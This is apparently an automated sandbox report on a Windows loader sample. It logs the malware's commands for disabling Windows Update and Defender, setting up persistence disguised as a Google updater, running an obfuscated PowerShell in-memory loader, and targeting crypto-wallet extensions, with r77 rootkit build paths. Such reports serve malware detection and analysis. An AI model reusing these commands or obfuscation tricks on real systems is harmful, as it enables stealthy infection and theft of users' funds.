Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Users\user\AppData\Local\Microsoft\brave.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Users\user\AppData\Local\Microsoft\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\Users\user\AppData\Local\Microsoft\ofg.exe "C:\Users\user\AppData\Local\Microsoft\ofg.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\Users\user\AppData\Local\Microsoft\brave.exe "C:\Users\user\AppData\Local\Microsoft\brave.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\Users\user\AppData\Local\Microsoft\setup.exe "C:\Users\user\AppData\Local\Microsoft\setup.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\ofg.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe "/C schtasks /create /tn \ipNnOYSRDI /tr \"C:\Users\user\AppData\Roaming\ipNnOYSRDI\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \ipNnOYSRDI /tr \"C:\Users\user\AppData\Roaming\ipNnOYSRDI\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\brave.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\brave.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\brave.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\setup.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -enC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAnAEMAOgBcAFUAcwBlAHIAcwBcAFIAZQB2AGUAbABpAG4AJwAsACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACcAKQAgAC0ARgBvAHIAYwBlAA==
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\AppData\Local\Microsoft\brave.exe

File created: C:\Users\user~1\AppData\Local\Temp\3A08.tmp

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: 0.3.Loader.exe.a90000.0.unpack, BrEx.cs	Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
Source: 0.3.Loader.exe.a90000.0.unpack, Arguments.cs	Base64 encoded string: 'HFMUESFTBwgjQTUXD1MtBhAoShQXOQQRHCI2XxM0GAYPKTIXLlw4Gy8yWAYqOT4WEEAEBjVTQQouOx0UADUpUTUGSVI='

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6272:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5124:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6520:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1436:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4908:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7400:120:WilError_01
Source: C:\Users\user\AppData\Local\Microsoft\brave.exe	Mutant created: \Sessions\1\BaseNamedObjects\PeAkAaAa__shmem3_winpthreads_tdm_
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7432:120:WilError_01

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ipNnOYSRDI\svcupdater.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ipNnOYSRDI\svcupdater.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Loader.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: Loader.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\Release\r77-x86.pdb source: setup.exe, 00000015.00000002.535791052.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.532114626.0000000000D80000.00000040.00000400.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.532807947.0000000000DA0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\InstallStager\obj\Release\InstallStager.pdb source: brave.exe, 00000012.00000002.491582259.00000211F8572000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\InstallStager\obj\Release\InstallStager.pdb- source: brave.exe, 00000012.00000002.491582259.00000211F8572000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svcupdater.exe, 00000011.00000002.551221495.0000019C33010000.00000040.00001000.00020000.00000000.sdmp, svcupdater.exe, 00000011.00000002.551047553.0000019C32FE0000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\x64\Release\Install.pdb source: brave.exe, 00000012.00000002.491582259.00000211F8572000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.500875315.00007FF7FDB7D000.00000002.00000001.01000000.00000000.sdmp, dialer.exe, 0000002F.00000000.477979440.00007FF7FDB7D000.00000002.00000001.01000000.00000000.sdmp

Data Obfuscation

Obfuscated command line found

Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00AE95FB push ecx; ret	0_2_00AE960E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_2_053E8976 push es; retf	2_2_053E8977
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 2_2_0AC26F40 push 340AB84Bh; ret	2_2_0AC26F45

Source: ofg.exe.2.dr	Static PE information: section name: .symtab
Source: brave.exe.2.dr	Static PE information: section name: .xdata
Source: svcupdater.exe.13.dr	Static PE information: section name: .symtab
Source: updater.exe.18.dr	Static PE information: section name: .xdata
Source: 3A08.tmp.18.dr	Static PE information: section name: _RDATA

Source: nsExec.dll.21.dr	Static PE information: real checksum: 0x0 should be: 0xde0c
Source: 3A08.tmp.18.dr	Static PE information: real checksum: 0x0 should be: 0x5841e
Source: Loader.exe	Static PE information: real checksum: 0x0 should be: 0x6670b
Source: updater.exe.18.dr	Static PE information: real checksum: 0x2ce193 should be: 0x2c34ef
Source: brave.exe.2.dr	Static PE information: real checksum: 0x2ce193 should be: 0x2c34ee
Source: setup.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x600c8d
Source: svcupdater.exe.13.dr	Static PE information: real checksum: 0x0 should be: 0x4d170c
Source: ofg.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x4d170c

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe

Creates files in the system32 config directory

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell

Source: C:\Users\user\AppData\Local\Microsoft\brave.exe	File created: C:\Program Files\Google\Chrome\updater.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\ofg.exe	File created: C:\Users\user\AppData\Roaming\ipNnOYSRDI\svcupdater.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\Users\user\AppData\Local\Microsoft\brave.exe	Jump to dropped file
